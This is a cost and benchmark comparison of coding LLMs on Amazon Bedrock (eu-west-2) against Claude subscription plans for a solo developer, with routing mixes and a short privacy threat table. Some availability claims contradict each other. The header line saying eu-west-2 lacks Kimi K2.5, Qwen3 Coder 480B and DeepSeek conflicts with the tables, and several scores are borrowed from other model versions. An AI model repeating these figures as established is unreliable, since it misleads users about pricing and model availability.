Profile: Solo Developer
Region: eu-west-2 (London) — primary; us-east-1 (N. Virginia) for reference
Currency: EUR (conversion rate: 1 USD = 0.92 EUR, April 2026)
VAT: All EUR prices include 20% VAT (consumer/no VAT ID). Business with EU VAT ID: apply reverse charge (divide by 1.20 for ex-VAT).
Date: 2026-04-01
Stack: Amazon Bedrock + Tailscale VPN
Important: eu-west-2 (London) has the most coding models (60) of any EU region and is the recommended choice. eu-west-3 (Paris) has only 32 models (no coding-specific ones). eu-west-2 (London) has 59 models but lacks Kimi K2.5, Qwen3 Coder 480B, and DeepSeek. EU regions carry a ~20% price premium over us-east-1. DeepSeek R1 and Llama 4 are NOT available in any EU region.
Data sources: AWS Pricing API (2026-03-26), Onyx Open LLM Leaderboard (2026-04-01).
| Model | Provider | Params | Input (€/1K tokens) | Output (€/1K tokens) | SWE-bench | HumanEval | LiveCodeBench | GPQA | Arena |
|---|---|---|---|---|---|---|---|---|---|
| Qwen3 Coder 30B | Qwen | 30B | €0.000199 | €0.000773 | N/A | N/A | N/A | N/A | N/A |
| Qwen3 Coder 480B | Qwen | 480B | €0.000596 | €0.002384 | N/A* | N/A* | N/A* | N/A* | N/A* |
| Qwen3 Coder Next | Qwen | N/A | €0.000662 | €0.001590 | N/A | N/A | N/A | N/A | N/A |
| Mistral Large 3 | Mistral | 675B | €0.000662 | €0.001987 | N/A | 92.0 | 82.8 | 43.9 | 1416 |
| DeepSeek V3.1 | DeepSeek | 685B | €0.000768 | €0.002226 | 67.8** | N/A | 74.1** | 79.9** | 1423** |
| Kimi K2.5 | Moonshot | 1T | €0.000794 | €0.003312 | 76.8*** | 99.0*** | 85.0*** | 87.6*** | 1438*** |
Not available in EU regions:
| Model | Provider | us-east-1 Input ($/1K tokens) | us-east-1 Output ($/1K tokens) | SWE-bench | HumanEval | LiveCodeBench |
|---|---|---|---|---|---|---|
| Llama 4 Scout 17B | Meta | $0.00017 | $0.00066 | N/A | N/A | N/A |
| Llama 4 Maverick 17B | Meta | $0.00024 | $0.00097 | N/A | 62.0 | 43.4 |
| DeepSeek R1 | DeepSeek | $0.00135 | $0.00540 | 49.2 | 90.2 | 65.9 |
| Model | Input ($/1K tokens) | Output ($/1K tokens) | EU Premium |
|---|---|---|---|
| Qwen3 Coder 30B | $0.00015 | $0.00060 | +20% |
| Qwen3 Coder 480B | $0.00045 | $0.00180 | +20% |
| Mistral Large 3 | $0.00050 | $0.00150 | +20% |
| DeepSeek V3.1 | $0.00058 | $0.00168 | +20% |
| Kimi K2.5 | $0.00060 | $0.00250 | +20% |
| DeepSeek R1 | $0.00135 | $0.00540 | N/A (EU unavailable) |
* Qwen3 Coder 480B is a code-specialized variant of Qwen3; general benchmarks available for Qwen 3 235B (SWE-bench N/A, LiveCodeBench 74.1, GPQA 81.1, Arena 1423) and Qwen 3.5 397B (SWE-bench 76.4, LiveCodeBench 83.6, GPQA 88.4, Arena 1450).
** Leaderboard shows DeepSeek V3.2 (685B) — V3.1 on Bedrock is the prior version; scores may be slightly lower.
*** Leaderboard shows Kimi K2.5 — Bedrock offers K2 Thinking; K2.5 scores shown as upper bound.
Flex/batch tiers offer ~50% discount on most models. Qwen3 Coder Next is available in eu-west-2 but not us-east-1.
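The EUR prices in the first table are consistent with taking the us-east-1 USD price, applying the ~20% EU premium, converting at 0.92, and adding 20% VAT. The sketch below reproduces that chain under those assumptions; the function names are illustrative, and individual rows (for example the Qwen3 Coder 30B output price) may deviate slightly because the real EU premium is not exactly 20% for every SKU.

```python
USD_TO_EUR = 0.92   # conversion rate stated in the header (April 2026)
EU_PREMIUM = 1.20   # ~20% eu-west-2 premium over us-east-1 (approximation)
VAT = 1.20          # 20% VAT for consumers without a VAT ID


def usd_to_eur_incl_vat(usd_price: float, eu_premium: float = EU_PREMIUM) -> float:
    """Convert a us-east-1 USD price into an EU price in EUR including VAT."""
    return usd_price * eu_premium * USD_TO_EUR * VAT


def ex_vat(eur_incl_vat: float) -> float:
    """Reverse-charge case: strip VAT by dividing by 1.20."""
    return eur_incl_vat / VAT


mistral_input = usd_to_eur_incl_vat(0.00050)
print(f"Mistral Large 3 input, incl. VAT: {mistral_input:.6f} EUR per 1K tokens")
print(f"Mistral Large 3 input, ex-VAT:    {ex_vat(mistral_input):.6f} EUR per 1K tokens")
```

Passing `eu_premium=1.0` gives the us-east-1 price converted to EUR incl. VAT, which is useful for the models that are not hosted in the EU.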
| Benchmark | What It Measures | Scale |
|---|---|---|
| SWE-bench | Real-world GitHub issue resolution (end-to-end) | % resolved (higher = better) |
| HumanEval | Function-level code generation from docstrings | % pass@1 (higher = better) |
| LiveCodeBench | Competitive programming problems (contamination-free) | % solved (higher = better) |
| GPQA Diamond | Graduate-level science/reasoning questions | % correct (higher = better) |
| Chatbot Arena | Human preference rating (ELO-style) | ELO score (higher = better) |
| Scenario | Requests/day | Avg Input Tokens | Avg Output Tokens | Monthly Tokens (in/out) |
|---|---|---|---|---|
| Light (occasional assist) | 30 | 1,500 | 3,000 | 1.35M / 2.7M |
| Medium (daily coding partner) | 80 | 2,000 | 4,000 | 4.8M / 9.6M |
| Heavy (pair programming all day) | 200 | 3,000 | 5,000 | 18M / 30M |
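The monthly token volumes in the table follow from requests per day times average tokens per request, assuming a 30-day month (the 30-day figure is inferred from the table, not stated). A small sketch:

```python
def monthly_tokens(requests_per_day: int, avg_input: int, avg_output: int,
                   days: int = 30) -> tuple[int, int]:
    """Return (input_tokens, output_tokens) per month for a usage scenario."""
    return (requests_per_day * avg_input * days,
            requests_per_day * avg_output * days)


# (requests/day, avg input tokens, avg output tokens) from the scenario table
SCENARIOS = {
    "light": (30, 1_500, 3_000),
    "medium": (80, 2_000, 4_000),
    "heavy": (200, 3_000, 5_000),
}

for name, params in SCENARIOS.items():
    tokens_in, tokens_out = monthly_tokens(*params)
    print(f"{name}: {tokens_in / 1e6:.2f}M in / {tokens_out / 1e6:.2f}M out")
```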
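Models are ranked by overall coding strength. The coding composite is the average of SWE-bench, HumanEval, and LiveCodeBench where available. Composites built from different benchmark subsets are not directly comparable (Mistral Large 3's 87.4 omits SWE-bench, and the Qwen3 Coder 480B figure is an estimate), which is why the rank order does not strictly follow the composite value.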
| Rank | Model | Coding Composite | Light | Medium | Heavy |
|---|---|---|---|---|---|
| 1 | Kimi K2.5 | 86.9 (SWE 76.8, HE 99.0, LCB 85.0) | €10.02 | €35.62 | €113.66 |
| 2 | Mistral Large 3 | 87.4 (HE 92.0, LCB 82.8) | €6.26 | €22.26 | €71.54 |
| 3 | DeepSeek V3.1 | 70.9 (SWE 67.8, LCB 74.1)** | €7.04 | €25.06 | €80.60 |
| 4 | Qwen3 Coder 480B | ~77* (est. from Qwen 3.5 family) | €7.25 | €25.75 | €82.27 |
| 5 | Qwen3 Coder Next | N/A (new model, no benchmarks yet) | €5.18 | €18.44 | €59.63 |
| 6 | Qwen3 Coder 30B | N/A (no benchmarks) | €2.35 | €8.38 | €26.77 |
Not available in eu-west-2 (us-east-1 only, in USD + VAT where applicable):
| Rank | Model | Coding Composite | Light | Medium | Heavy |
|---|---|---|---|---|---|
| - | DeepSeek R1 | 68.4 (SWE 49.2, HE 90.2, LCB 65.9) | $16.40 | $58.32 | $186.30 |
| - | Llama 4 Maverick | 52.7 (HE 62.0, LCB 43.4) | $2.95 | $10.46 | $33.42 |
* Qwen3 Coder 480B estimated from Qwen 3.5 (SWE 76.4, LCB 83.6) — code-specialized variant likely scores higher.
** V3.2 scores shown; V3.1 on Bedrock may score slightly lower.
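The cost columns above can be reproduced by reading the listed prices as per 1,000 tokens (an inference from the arithmetic) and multiplying by the monthly token volumes. The composite is a plain average of whichever coding benchmarks exist for a model. A minimal sketch with illustrative function names:

```python
from statistics import mean
from typing import Optional


def monthly_cost(tokens_in: int, tokens_out: int,
                 price_in_per_1k: float, price_out_per_1k: float) -> float:
    """Inference cost for one month, with prices expressed per 1,000 tokens."""
    return tokens_in / 1000 * price_in_per_1k + tokens_out / 1000 * price_out_per_1k


def coding_composite(swe: Optional[float] = None,
                     humaneval: Optional[float] = None,
                     livecodebench: Optional[float] = None) -> Optional[float]:
    """Average of the available coding benchmarks, or None if there are none."""
    scores = [s for s in (swe, humaneval, livecodebench) if s is not None]
    return round(mean(scores), 1) if scores else None


# Mistral Large 3 at medium use: 4.8M input / 9.6M output tokens per month
cost = monthly_cost(4_800_000, 9_600_000, 0.000662, 0.001987)
print(f"Mistral Large 3, medium: EUR {cost:.2f}")

print("Kimi K2.5 composite:", coding_composite(swe=76.8, humaneval=99.0, livecodebench=85.0))
print("Mistral Large 3 composite:", coding_composite(humaneval=92.0, livecodebench=82.8))
```

The computed cost can differ from the table by about a cent because the table was presumably built from unrounded prices.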
| Component | Cost (EUR incl. VAT) | Notes |
|---|---|---|
| Tailscale Personal | €0 | Free for 1 user, 100 devices |
| EC2 t3.micro (Tailscale subnet router) | €10.49 | eu-west-2 pricing; or use own machine = €0 |
| Lambda (orchestration) | €1.20-3.60 | Free tier covers most solo dev usage |
| API Gateway | €1.20-2.40 | Minimal at solo dev volume |
| CloudWatch | €3.60 | Basic logging |
| VPC Endpoint for Bedrock (optional) | €9.28 | Keeps traffic off public internet |
| Total (minimal) | ~€6 | Tailscale on own machine, Lambda free tier |
| Total (recommended) | ~€28 | With VPC endpoint and EC2 subnet router |
Using ~€6/mo minimal fixed infra (incl. VAT). Models ranked by value score (coding quality per euro).
| Model | Coding Quality | Medium Cost | Value Score | Tier |
|---|---|---|---|---|
| Mistral Large 3 | 87.4 | ~€28 | 3.12 | BEST VALUE |
| Qwen3 Coder 480B | ~77* | ~€32 | 2.41 | BEST VALUE |
| DeepSeek V3.1 | 70.9 | ~€31 | 2.29 | GOOD VALUE |
| Kimi K2.5 | 86.9 | ~€42 | 2.07 | HIGH QUALITY |
| Qwen3 Coder Next | N/A | ~€24 | N/A | NEW — WATCH |
| Qwen3 Coder 30B | N/A | ~€14 | N/A | CHEAPEST |
Value Score = Coding Composite / Monthly Cost (medium use). Higher = better bang for buck.
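As a worked example of the formula, the sketch below recomputes the value scores from the medium-use inference costs plus the ~€6 infra. Rounding the monthly cost to whole euros before dividing is an assumption that happens to reproduce the table.

```python
INFRA_EUR = 6.0  # minimal fixed infra per month, incl. VAT


def value_score(composite: float, inference_eur: float,
                infra_eur: float = INFRA_EUR) -> float:
    """Coding composite per euro of total monthly cost (medium use)."""
    total = round(inference_eur + infra_eur)  # whole euros, as shown in the table
    return round(composite / total, 2)


# model -> (coding composite, medium-use inference cost in EUR incl. VAT)
MODELS = {
    "Mistral Large 3": (87.4, 22.26),
    "Qwen3 Coder 480B": (77.0, 25.75),
    "DeepSeek V3.1": (70.9, 25.06),
    "Kimi K2.5": (86.9, 35.62),
}

ranked = sorted(MODELS.items(), key=lambda item: value_score(*item[1]), reverse=True)
for name, (composite, inference) in ranked:
    print(f"{name}: {value_score(composite, inference)}")
```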
| Model | Light | Medium | Heavy |
|---|---|---|---|
| Qwen3 Coder 30B | ~€8 | ~€14 | ~€33 |
| Qwen3 Coder Next | ~€11 | ~€24 | ~€66 |
| Mistral Large 3 | ~€12 | ~€28 | ~€78 |
| Qwen3 Coder 480B | ~€13 | ~€32 | ~€88 |
| DeepSeek V3.1 | ~€13 | ~€31 | ~€87 |
| Kimi K2.5 | ~€16 | ~€42 | ~€120 |
- DeepSeek R1 is NOT available in EU regions, and it is not the best coding model anyway. It excels at math/reasoning (AIME 87.5%, MATH 97.3%), but its SWE-bench score (49.2%) is mediocre. If you need it, you must use us-east-1.
- Mistral Large 3 is the best value for coding in the EU: HumanEval 92.0% and LiveCodeBench 82.8% at only ~€28/mo medium use (incl. VAT). Its weak GPQA (43.9%) matters little for coding workflows.
- Kimi K2.5 is the overall coding champion on Bedrock, with the highest score on every coding benchmark listed (SWE-bench 76.8%, HumanEval 99.0%, LiveCodeBench 85.0%), but at ~€42/mo it costs 50% more than Mistral Large 3.
- Qwen3 Coder 480B is likely underrated. As a code-specialized model derived from the Qwen 3.5 family (SWE-bench 76.4%, LiveCodeBench 83.6%, Arena 1450), it may match or exceed Kimi K2.5 on coding tasks at lower cost. No standalone benchmarks are available yet.
- Qwen3 Coder Next is a new EU-available model at a competitive price point (~€24/mo medium incl. VAT). No benchmark data exists yet, so it is worth monitoring.
- Llama 4 Maverick is weak for coding (HumanEval 62.0%, LiveCodeBench 43.4%) and unavailable in the EU. Not recommended.
- The EU premium is a flat 20% across all models vs us-east-1. For data residency or latency reasons, this is a reasonable trade-off.
| Use Case | Model | Why | Monthly Cost (EUR incl. VAT) |
|---|---|---|---|
| Daily coding (primary) | Mistral Large 3 | Best value: HE 92%, LCB 82.8% | ~€28 |
| Complex refactoring / bug hunting | Kimi K2.5 | Highest coding scores across all benchmarks | ~€42 |
| Quick completions / boilerplate | Qwen3 Coder 30B | Cheapest, fast, good enough for simple tasks | ~€14 |
| Math/algorithm problems | DeepSeek R1 (us-east-1) | AIME 87.5%, MATH 97.3% — cross-region, use sparingly | Pay-per-use (USD) |
Estimated monthly cost with multi-model strategy: ~€29-36/mo incl. VAT (Mistral primary + Qwen3 30B for simple tasks, Kimi on-demand for hard problems).
| Level (req/day) | Per hour (8h day) | Mindset | Real-world behavior |
|---|---|---|---|
| Light (30/day) | ~4/hour | "I ask AI when I'm stuck" | Occasional help with syntax, errors, quick lookups |
| Medium (80/day) | ~10/hour | "AI is my coding partner" | Active use for key tasks — generation, reviews, tests |
| Heavy (200/day) | ~25/hour | "I don't write a line without AI" | Constant pair programming, every function AI-assisted |
| Power (400/day) | ~50/hour | "AI writes, I review and steer" | Full AI-driven development, large refactors, multi-file work |
| Extreme (800+/day) | ~100/hour | "Automated agents + human oversight" | CI/CD agents, batch processing, parallel coding agents |
| Activity | Requests | Typical Tokens (in/out) | Daily Output |
|---|---|---|---|
| Code generation ("write a function that...") | 40-50 | 2K / 6K | ~300K |
| Code review / explain ("what does this do?") | 20-30 | 4K / 3K | ~90K |
| Debugging ("why is this failing?") | 30-40 | 5K / 4K | ~160K |
| Refactoring ("make this cleaner") | 20-30 | 4K / 5K | ~150K |
| Test generation ("write tests for...") | 20-30 | 3K / 8K | ~240K |
| Chat / Q&A ("how do I X in Python?") | 30-40 | 1K / 2K | ~80K |
| Total | ~200 | avg 3K / 5K | ~1.0M/day |
A power user (400/day) doubles the above. An extreme user runs automated pipelines that multiply it further.
| Plan | Price (USD ex-VAT) | Price (EUR incl. VAT) | Usage Limits | Messages (est.) |
|---|---|---|---|---|
| Claude Pro | $20/mo | ~€22 | Baseline | ~40-45 per 5h window (~120-160/day) |
| Claude Max 5x | $100/mo | ~€110 | 5x Pro | ~225 per 5h window (~450/day) |
| Claude Max 20x | $200/mo | ~€221 | 20x Pro | ~900 per 5h window (~1800/day) |
Claude limitations:
- Limits are dynamic — reduced during peak hours (5am-11am PT weekdays)
- Shared between Claude chat and Claude Code
- Longer conversations and larger codebases consume more tokens per message
- Anthropic-only models (Claude Sonnet/Opus) — no model choice flexibility
- No data residency guarantee for EU
- VAT is charged on top for EU consumers without a VAT ID
| Model | Heavy (~Pro), 200 req/day | Power (~Max 5x), 400 req/day | Extreme (~Max 20x), 800 req/day |
|---|---|---|---|
| Qwen3 Coder 30B | €33 | €59 | €112 |
| Qwen3 Coder Next | €66 | €125 | €245 |
| Mistral Large 3 | €78 | €149 | €292 |
| Qwen3 Coder 480B | €88 | €170 | €335 |
| DeepSeek V3.1 | €87 | €167 | €328 |
| Kimi K2.5 | €120 | €233 | €461 |
Includes ~€6 minimal infra (incl. VAT).
Split traffic: 60% Qwen3 Coder 30B (simple) + 30% Mistral Large 3 (quality) + 10% Kimi K2 (hard problems).
| Tier | Daily Requests | Monthly Cost (EUR incl. VAT) |
|---|---|---|
| Heavy (~Pro equivalent) | 200/day | ~€62 |
| Power (~Max 5x equivalent) | 400/day | ~€110 |
| Extreme (~Max 20x equivalent) | 800/day | ~€214 |
Includes ~€6 minimal infra (incl. VAT).
| | Claude Pro | Claude Max 5x | Claude Max 20x | Bedrock Multi-Model |
|---|---|---|---|---|
| Monthly cost | ~€22 | ~€110 | ~€221 | €29-214 (scales with use) |
| Equivalent Bedrock cost | €29-62 | €110 | €214 | — |
| Model choice | Claude only | Claude only | Claude only | 6+ models, swap anytime |
| Throttling | Peak hours limited | Peak hours limited | Rare | Never (pay-per-use) |
| Hard cap | Yes (window resets) | Yes (window resets) | Yes (window resets) | No — unlimited |
| Cost at low usage | €22 (flat) | €110 (flat) | €221 (flat) | €8-14 (pay only what you use) |
| EU data residency | No | No | No | Yes (eu-west-2) |
| Open source client | No | No | No | Yes (OpenCode) |
| Coding quality | Excellent (Opus/Sonnet) | Excellent | Excellent | Varies by model (see benchmarks) |
| Agentic capabilities | Best-in-class | Best-in-class | Best-in-class | Good (OpenCode + MCP) |
| Scenario | Winner | Why |
|---|---|---|
| Light-to-medium solo dev (€22-36 budget) | Claude Pro | Flat rate, excellent quality, no setup |
| Medium dev who needs EU data residency | Bedrock | Only option with guaranteed EU hosting |
| Heavy dev who hates throttling | Bedrock | No caps, no peak-hour limits |
| Power user, budget-conscious | Bedrock multi-model | €110 matches Max 5x but with no caps |
| Power user, quality-first | Claude Max 5x | Opus/Sonnet agentic quality is unmatched |
| Extreme / automated pipelines | Bedrock | Claude caps make automation unreliable |
| Dev who needs model diversity | Bedrock + OpenCode | 6+ models, local fallback via Ollama |
| Dev who wants zero setup | Claude Pro/Max | Works out of the box, no infra to manage |
| If you use... | Claude costs | Bedrock costs (multi-model) | Verdict |
|---|---|---|---|
| < 80 req/day | €22 (Pro) | €14-29 | Roughly equal — Claude Pro simpler |
| 80-200 req/day | €22 (Pro, may throttle) | €29-62 | Bedrock wins if you hit Claude limits |
| 200-450 req/day | €110 (Max 5x) | €62-110 | Bedrock wins on cost |
| 450-900 req/day | €221 (Max 20x) | €110-214 | Bedrock wins on cost |
| 900+ req/day | €221 (Max 20x, capped) | €214+ (uncapped) | Bedrock wins — Claude can't serve this |
The crossover point: once usage outgrows Claude Pro (roughly 200 requests/day), Bedrock with multi-model routing (€62-110) costs less than Claude Max 5x (€110). Below ~80 req/day, Claude Pro is simpler and roughly the same cost.
The key advantage of Bedrock over Claude subscriptions is routing each request to the right model. Not every coding task needs a premium reasoning model — most don't.
| Tier | Model | Coding Quality | Cost at 100% Heavy (200 req/day) incl. VAT | Best For |
|---|---|---|---|---|
| Budget | Qwen3 Coder 30B | N/A (fast, lightweight) | €27/mo | Boilerplate, completions, docstrings, commit messages, quick Q&A |
| Mid | Qwen3 Coder 480B | ~77 (est. from Qwen 3.5 family) | €82/mo | Code generation, refactoring, code review, test writing |
| Mid-alt | Qwen3 Coder Next | N/A (new, promising) | €60/mo | Same as Mid, cheaper, unproven benchmarks |
| Premium | Kimi K2.5 | 86.9 (SWE 77%, HE 99%, LCB 85%) | €114/mo | Complex debugging, architecture, multi-file refactors, security review |
| Mix | Budget (Qwen3 30B) | Mid (Qwen3 480B) | Premium (Kimi K2.5) | Description |
|---|---|---|---|---|
| A — Mostly budget | 80% | 15% | 5% | AI for boilerplate, premium only for hard bugs |
| B — Balanced | 60% | 30% | 10% | Daily partner with quality escalation |
| C — Quality-leaning | 40% | 40% | 20% | Most real work on quality models |
| D — Premium-heavy | 20% | 40% | 40% | Quality-first, budget only for trivial tasks |
| E — All premium | 0% | 30% | 70% | Maximum quality, no compromises |
Includes ~€6 minimal infra (incl. VAT).
| Mix | Heavy (200/day) | Power (400/day) | Extreme (800/day) | vs Claude (incl. VAT) |
|---|---|---|---|---|
| A — Mostly budget | €44 | €82 | €157 | Cheaper than Max 5x (€110) up to Power |
| B — Balanced | €55 | €104 | €202 | Half the cost of Max 5x (€110) at Heavy |
| C — Quality-leaning | €68 | €130 | €254 | Under Max 5x (€110) at Heavy |
| D — Premium-heavy | €85 | €164 | €324 | Under Max 5x at Heavy, under Max 20x (€221) at Power |
| E — All premium | €107 | €208 | €410 | Matches Max 5x at Heavy, under Max 20x at Power |
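The mix costs are a weighted average of per-tier inference cost plus the fixed infra. The sketch below shows the calculation. One assumption needs flagging: the table's figures are reproduced when the Mid tier is costed at €71.54 per month at Heavy use (the Mistral Large 3 rate from the ranking table), which is inferred from the arithmetic rather than stated in the text. Scaling linearly with requests per day is also an assumption.

```python
INFRA_EUR = 6.0  # minimal fixed infra per month, incl. VAT

# Heavy-tier (200 req/day) inference cost per tier, EUR incl. VAT.
# The "mid" value is an assumption inferred from the table's arithmetic.
HEAVY_COST = {"budget": 26.77, "mid": 71.54, "premium": 113.66}

MIXES = {
    "A": {"budget": 0.80, "mid": 0.15, "premium": 0.05},
    "B": {"budget": 0.60, "mid": 0.30, "premium": 0.10},
    "C": {"budget": 0.40, "mid": 0.40, "premium": 0.20},
    "D": {"budget": 0.20, "mid": 0.40, "premium": 0.40},
    "E": {"budget": 0.00, "mid": 0.30, "premium": 0.70},
}


def blended_cost(mix: dict[str, float], requests_per_day: int = 200,
                 infra_eur: float = INFRA_EUR) -> float:
    """Monthly cost of a traffic mix, scaled linearly from the 200 req/day baseline."""
    if abs(sum(mix.values()) - 1.0) > 1e-9:
        raise ValueError("mix shares must sum to 1.0")
    inference = sum(share * HEAVY_COST[tier] for tier, share in mix.items())
    return inference * (requests_per_day / 200) + infra_eur


for name, mix in MIXES.items():
    print(f"Mix {name}: EUR {blended_cost(mix):.0f} at Heavy, "
          f"EUR {blended_cost(mix, 400):.0f} at Power")
```

Swapping a different model into a tier only requires changing the corresponding entry in `HEAVY_COST`.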
| Mix | Heavy (200/day) | Power (400/day) | Extreme (800/day) |
|---|---|---|---|
| A — Mostly budget | €41 | €76 | €146 |
| B — Balanced | €49 | €93 | €180 |
| C — Quality-leaning | €60 | €114 | €223 |
| D — Premium-heavy | €77 | €147 | €289 |
| E — All premium | €98 | €191 | €376 |
| Task | Tier | Why | % of typical day |
|---|---|---|---|
| Autocomplete / boilerplate | Budget | Speed > quality, trivial output | 15-20% |
| Docstrings / comments | Budget | Template-driven, any model handles this | 5-10% |
| Commit messages | Budget | Short output, low complexity | 5% |
| "How do I X?" questions | Budget | Simple retrieval, no deep reasoning | 10-15% |
| Code generation (new functions) | Mid | Needs correctness, type awareness | 15-20% |
| Code review / explain | Mid | Needs understanding of patterns | 10% |
| Test generation | Mid | Needs coverage awareness, edge cases | 10-15% |
| Refactoring | Mid / Premium | Mid for simple, Premium for architectural | 10% |
| Complex debugging | Premium | Needs deep reasoning, multi-file context | 5-10% |
| Architecture / design decisions | Premium | Highest reasoning quality needed | 2-5% |
| Security review | Premium | Must not miss vulnerabilities | 2-5% |
A typical developer's natural distribution lands around Mix B-C (balanced to quality-leaning).
€0 €25 €50 €75 €100 €125 €150 €175 €200 €225
|---------|---------|---------|---------|---------|---------|---------|---------|---------|
Mix A ██████████████████░ €44
Mix B ██████████████████████░ €55
Mix C ████████████████████████████░ €68
Mix D ██████████████████████████████████░ €85
Mix E ████████████████████████████████████████████░ €107
Claude Pro █████████░ €22 (but throttles at this usage)
Claude Max 5x ████████████████████████████████████████████████░ €110
Claude Max 20x ████████████████████████████████████████████████████████████████████████████████████████████░ €221
| Monthly Budget | Recommended Mix | What You Get |
|---|---|---|
| €35-50 | Mix A (80/15/5) | AI for everything, quality when it matters |
| €50-70 | Mix B (60/30/10) | Strong daily partner, good quality balance |
| €65-90 | Mix C (40/40/20) | Quality-focused, budget only for trivial tasks |
| €85-120 | Mix D (20/40/40) | Near-premium experience at ~77% of Claude Max 5x |
| €107+ | Mix E (0/30/70) | Maximum quality, comparable to Claude Max 5x |
Mix B (balanced) at €55/mo delivers 80-90% of the coding quality of an all-premium setup at half the cost. The Budget tier handles 60% of requests perfectly fine — completions, boilerplate, Q&A — while the premium tier is reserved for the 10% of tasks where reasoning quality actually impacts the outcome.
Compared to Claude Max 5x (€110/mo incl. VAT), Mix B saves ~€55/mo with no throttling, no caps, EU data residency, and model flexibility. The trade-off is that Claude's agentic capabilities (Opus/Sonnet) are still superior for complex multi-step coding tasks.
Automatic routing between cheap and expensive models is a solved problem with several open-source projects available.
| Project | Stars | Approach | Bedrock Support | Best For |
|---|---|---|---|---|
| NadirClaw | ~377 | 3-tier sentence-embedding classifier (~10ms), drop-in proxy | Via LiteLLM | Drop-in proxy for OpenCode/Cursor/Claude Code |
| RouteLLM | ~4.7K | Strong/weak routing with pre-trained classifiers (BERT, MF) | Via LiteLLM | Best classifier accuracy (LMSYS/Chatbot Arena team) |
| LLMRouter | ~1.6K | 16+ routing models (KNN, SVM, MLP, BERT), unified CLI | No | Research and evaluation |
| Bifrost | ~3.4K | High-perf Go gateway, <100us overhead, 5K RPS | Native | Gateway/failover layer |
| UncommonRoute | ~182 | Simple cost/quality balancer, 90-95% cost reduction | No | Lightweight reference |
| LiteLLM | ~41.8K | Unified proxy, 100+ providers, cost tracking, rate limiting | Native | Base gateway layer |
| Strategy | How It Works | Accuracy | Latency | Extra Cost |
|---|---|---|---|---|
| Sentence-embedding classifier (NadirClaw) | Embeds the prompt, classifies complexity | ~85-90% | ~10ms | none (runs locally) |
| Pre-trained BERT classifier (RouteLLM) | Fine-tuned on Chatbot Arena data | ~90-95% | ~20ms | none (runs locally) |
| Two-pass confidence self-assessment (custom) | Budget model rates its own confidence | ~85% | Full budget response time | ~0.20/mo |
| Keyword/pattern matching (custom) | Regex on prompt content | ~70% | <1ms | none |
| Small model classifier (custom) | Budget model classifies before routing | ~85-90% | ~200ms | ~0.20/mo |
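To make the simplest strategy in the table concrete, here is a minimal sketch of keyword/pattern routing. The patterns and tier names are hypothetical and would need tuning against real prompts; this is not how NadirClaw or RouteLLM classify requests.

```python
import re

# Hypothetical patterns; checked in order, most expensive tier first.
PREMIUM = re.compile(
    r"\b(?:architecture|security|vulnerab\w*|race condition|deadlock\w*|multi-file)\b")
MID = re.compile(r"\b(?:refactor\w*|review\w*|tests?|implement\w*|generate\w*)\b")


def route(prompt: str) -> str:
    """Return 'premium', 'mid', or 'budget' based on keywords in the prompt."""
    text = prompt.lower()
    if PREMIUM.search(text):
        return "premium"
    if MID.search(text):
        return "mid"
    return "budget"  # default: cheapest model


for prompt in ("Write a commit message for this diff",
               "Refactor this function to be cleaner",
               "Is there a security vulnerability in this login handler?"):
    print(f"{route(prompt):8s} <- {prompt}")
```

Defaulting to the budget tier keeps cost low when nothing matches; a cautious setup might default to mid instead, trading cost for fewer under-routed requests.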
OpenCode --> NadirClaw or custom proxy (localhost:4000) --> LiteLLM --> Bedrock (eu-west-2)
| |
Sentence-embedding AWS SDK + VPC endpoint
classifier (~10ms) via Tailscale tunnel
|
+------+------+
v v v
Budget Mid Premium
(Qwen 30B)(Qwen 480B)(Kimi K2.5)
Option A -- Use NadirClaw directly (CHOSEN): Install NadirClaw, configure three Bedrock models via LiteLLM, point OpenCode to it. Fastest path to production. Includes cost tracking, budget alerts, fallback chains, and a live dashboard. See SETUP_GUIDE.md for the complete recipe.
Option B -- Custom proxy with RouteLLM classifier: Build a FastAPI proxy that uses RouteLLM's pre-trained classifier for routing decisions and LiteLLM for Bedrock calls. More control, includes security middleware and two-pass fallback.
Option C -- Custom two-pass router: Full custom implementation with confidence self-assessment, pattern-based force routing, security middleware, and cost tracking. Most control, most maintenance.
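The control flow behind Option C can be sketched as follows. The model callables are stand-ins for real LiteLLM/Bedrock calls, and the way confidence is obtained (here the budget callable simply returns a number), the 0.7 threshold, and the force-routing pattern are all assumptions for illustration.

```python
import re
from typing import Callable, Tuple

# Hypothetical force-routing rule: these topics always go to the premium model.
FORCE_PREMIUM = re.compile(r"\b(?:security|architecture|vulnerabilit\w+)\b", re.IGNORECASE)

BudgetModel = Callable[[str], Tuple[str, float]]  # returns (answer, self-rated confidence)
PremiumModel = Callable[[str], str]


def two_pass_route(prompt: str, budget_model: BudgetModel,
                   premium_model: PremiumModel,
                   threshold: float = 0.7) -> Tuple[str, str]:
    """Return (tier_used, answer); escalate when the budget model is unsure."""
    if FORCE_PREMIUM.search(prompt):
        return "premium", premium_model(prompt)
    answer, confidence = budget_model(prompt)
    if confidence >= threshold:
        return "budget", answer
    return "premium", premium_model(prompt)


# Stub models for a dry run; replace with real API calls.
def fake_budget(prompt: str) -> Tuple[str, float]:
    confidence = 0.9 if len(prompt) < 80 else 0.4
    return f"[budget] {prompt}", confidence


def fake_premium(prompt: str) -> str:
    return f"[premium] {prompt}"


tier, _ = two_pass_route("Write a docstring for add(a, b)", fake_budget, fake_premium)
print(tier)
```

The cost of this design is that escalated requests pay for the budget response as well, which matches the "full budget response time" latency noted in the strategy table.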
Amazon Bedrock is a managed API — you are NOT downloading models. Your prompts are sent to AWS-hosted inference infrastructure and responses are returned. Key guarantees:
- AWS does not use your data to train models
- Inputs/outputs are not stored beyond the request lifecycle
- Data is encrypted in transit (TLS) and at rest
- With a VPC endpoint, traffic never leaves the AWS backbone
- Third-party model providers (DeepSeek, Qwen, Moonshot, etc.) do NOT receive your requests — AWS hosts a copy of the model weights on its own infrastructure
| Threat | Risk Level | Mitigation |
|---|---|---|
| AWS operator sees your data in memory | Low | Contractual/compliance protections (SOC2, HIPAA BAA) |
| Data exfiltration via model | None | Model cannot initiate network connections |
| Model training on your data | None | AWS explicitly opts out in Bedrock |
| Man-in-the-middle | Very Low | TLS + Tailscale tunnel + VPC endpoint |
| Prompt injection leaking context | Medium | Never put secrets/credentials in prompts |
| Logs containing sensitive data | Medium | Disable CloudWatch prompt logging or encrypt |
| Data sent to model provider (DeepSeek/Qwen) | None | AWS hosts weights locally; providers have no access |
| Approach | Isolation | Monthly Cost |
|---|---|---|
| Bedrock API + VPC endpoint | High (trust AWS) | $10-60 |
| SageMaker dedicated endpoint | Higher (dedicated GPU) | $500-2,000+ |
| EC2 self-hosted (vLLM/Ollama) | Highest (full control) | $700-3,000+ |
